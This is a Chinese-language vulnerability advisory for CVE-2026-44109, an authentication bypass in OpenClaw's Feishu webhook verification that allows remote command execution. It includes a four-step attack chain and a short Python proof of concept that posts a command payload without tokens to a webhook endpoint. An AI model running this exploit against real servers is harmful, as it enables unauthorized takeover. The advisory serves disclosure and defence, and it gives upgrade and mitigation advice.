IPBUF安全漏洞报告
English
CVE-2026-44109 CVSS 9.8 严重

CVE-2026-44109 OpenClaw认证绕过漏洞

披露日期: 2026-05-06

漏洞信息

漏洞编号
CVE-2026-44109
漏洞类型
认证绕过
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

认证绕过远程代码执行OpenClawWebhook安全CVE-2026-44109

漏洞概述

OpenClaw 2026.4.15之前版本在飞书Webhook验证逻辑中存在缺陷。由于缺少encryptKey或令牌为空时系统默认放行,导致攻击者可绕过签名校验,直接访问命令分发接口执行任意代码。

技术细节

该漏洞源于OpenClaw在处理飞书Webhook及卡片操作时的“失效开放”设计缺陷。正常流程下,系统应验证请求的签名及令牌以确保来源可信。但在受影响版本中,当配置缺失`encryptKey`或回调令牌为空时,程序未拒绝请求,反而跳过安全检查。攻击者利用此逻辑,无需提供有效凭证即可构造恶意请求。由于签名验证和重放保护机制被绕过,攻击者可以注入恶意指令至命令分发模块,从而在服务器端执行任意系统命令,获取完全控制权。

攻击链分析

STEP 1
侦察
攻击者发现目标服务器运行了OpenClaw且版本低于2026.4.15,并开启了飞书Webhook接口。
STEP 2
漏洞利用
攻击者向Webhook端点发送特制的HTTP POST请求,故意不提供加密密钥或令牌,触发系统的“失效开放”逻辑以绕过认证。
STEP 3
命令执行
绕过验证的请求被传递至命令分发模块,解析攻击者注入的恶意指令并在服务器后台执行。
STEP 4
建立控制
攻击者利用执行命令的权限写入后门或反弹Shell,从而完全控制目标服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "http://target-ip/openclaw/webhook" # Malicious payload to execute a command (e.g., id) # The vulnerability allows bypassing encryption/token verification payload = { "action": "command", "command": "id" } try: # Sending request without proper encryption headers or tokens response = requests.post(target_url, json=payload) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") except Exception as e: print(f"Error: {e}")

影响范围

OpenClaw < 2026.4.15

防御指南

临时缓解措施
建议暂时禁用飞书Webhook接收功能,直至完成升级。同时,在网络边界防火墙或反向代理层设置访问策略,阻断外部非官方IP对OpenClaw Webhook端点的直接访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表